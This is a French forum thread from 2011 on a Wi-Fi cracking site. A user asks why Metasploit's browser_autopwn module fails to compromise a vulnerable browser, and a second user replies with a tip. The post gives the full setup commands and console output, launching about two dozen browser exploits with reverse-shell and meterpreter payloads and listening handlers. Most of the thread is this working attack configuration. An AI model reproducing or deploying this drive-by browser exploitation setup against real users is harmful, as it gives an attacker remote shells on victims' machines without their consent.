Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 29-12-2011 22:55:31

moi
N00b
Inscription : 29-12-2011
Messages : 1

metasploit browser_autopwn

Bonjour,

Je n'arrive plus à faire fonctionner le browser_autopwn de metasploit. Je l'utilisais sans problème avec la version 3 il y a environ 1 an.
Maintenant je suis avec la dernière version, la 4.2, et je n'arrive plus à rien...

Voilà comment je procède :
use server/browser_autopwn
set URIPATH /
set LHOST 192.168.1.15
set SRVPORT 80

J'ai donc ça :

msf  auxiliary(browser_autopwn) > show options 

Module options (auxiliary/server/browser_autopwn):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST       192.168.1.15     yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Je lance un run, tout se passe bien :

[*] Auxiliary module execution completed

[*] Setup
[*] Obfuscating initial javascript Thu Dec 29 21:42:36 +0100 2011
[*] Done in 72.008028 seconds

[*] Starting exploit modules on host 192.168.1.15...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/VwMx
[*]  Local IP: http://192.168.1.15:80/VwMx
[*] Server started.
msf  auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/FNED
[*]  Local IP: http://192.168.1.15:80/FNED
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/koqmsn
[*]  Local IP: http://192.168.1.15:80/koqmsn
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/KcRHwQ
[*]  Local IP: http://192.168.1.15:80/KcRHwQ
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/RJDQpvrzIc
[*]  Local IP: http://192.168.1.15:80/RJDQpvrzIc
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/mDXJocfiJ
[*]  Local IP: http://192.168.1.15:80/mDXJocfiJ
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/hNeOKPFEgC
[*]  Local IP: http://192.168.1.15:80/hNeOKPFEgC
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/wgjTgMFenk
[*]  Local IP: http://192.168.1.15:80/wgjTgMFenk
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/UCEsayUTQuot
[*]  Local IP: http://192.168.1.15:80/UCEsayUTQuot
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/kXvhqeP
[*]  Local IP: http://192.168.1.15:80/kXvhqeP
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/idrmullLF
[*]  Local IP: http://192.168.1.15:80/idrmullLF
[*] Server started.
[*] Starting exploit windows/browser/blackice_downloadimagefileurl with payload windows/meterpreter/reverse_tcp
[*] Starting exploit windows/browser/enjoysapgui_comp_download with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/RfUvu
[*]  Local IP: http://192.168.1.15:80/RfUvu
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/zjpdvWhHcxfY
[*]  Local IP: http://192.168.1.15:80/zjpdvWhHcxfY
[*] Server started.
[*] Starting exploit windows/browser/mozilla_interleaved_write with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/VxlWKaEcNdZz
[*]  Local IP: http://192.168.1.15:80/VxlWKaEcNdZz
[*] Server started.
[*] Using URL: http://0.0.0.0:80/Sqqj
[*]  Local IP: http://192.168.1.15:80/Sqqj
[*] Server started.
[*] Starting exploit windows/browser/mozilla_mchannel with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/kUwBx
[*]  Local IP: http://192.168.1.15:80/kUwBx
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/uXLId
[*]  Local IP: http://192.168.1.15:80/uXLId
[*] Server started.
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/HeHoz
[*]  Local IP: http://192.168.1.15:80/HeHoz
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/TgHcSLnc
[*]  Local IP: http://192.168.1.15:80/TgHcSLnc
[*] Server started.
[*] Starting exploit windows/browser/ms11_003_ie_css_import with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/qUMyoVDbLvDQ
[*]  Local IP: http://192.168.1.15:80/qUMyoVDbLvDQ
[*] Server started.
[*] Starting exploit windows/browser/ms11_050_mshtml_cobjectelement with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/AiFZRyQ
[*]  Local IP: http://192.168.1.15:80/AiFZRyQ
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/USOhkDpiwfCkV
[*]  Local IP: http://192.168.1.15:80/USOhkDpiwfCkV
[*] Server started.
[*] Starting exploit windows/browser/wmi_admintools with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/sCprMYseMWpc
[*]  Local IP: http://192.168.1.15:80/sCprMYseMWpc
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.1.15:3333 
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.1.15:6666 
[*] Started reverse handler on 192.168.1.15:7777 
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...

[*] --- Done, found 23 exploit modules

[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://192.168.1.15:80/
[*] Server started.

Mais quand je me connecte sur  http://192.168.1.15:80/ avec un navigateur faillible il ne se passe pas grand chose du coté de metasploit:

[*] 192.168.1.14     Browser Autopwn request '/'
[*] 192.168.1.14     Browser Autopwn request '/favicon.ico'
[*] 192.168.1.14     404ing /favicon.ico

Et du coté du navigateur faillible, la page s'arrête de charger très vite.


Voilà si quelqu'un voit d'où ça peut venir, moi je ne comprends pas.

Merci,
moi

Dernière modification par moi (29-12-2011 22:59:41)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 30-12-2011 06:31:37

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : metasploit browser_autopwn

Tu peux essayer en renseignant aussi le paramètre SRVHOST avec la même adresse IP que tu as mis pour LHOST, mais je doute que ça marche. Jettes un oeil à ce blog tout en bas de la page.

--> Blog perso D'OSWALD

Dernière modification par Fuji (30-12-2011 06:34:45)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]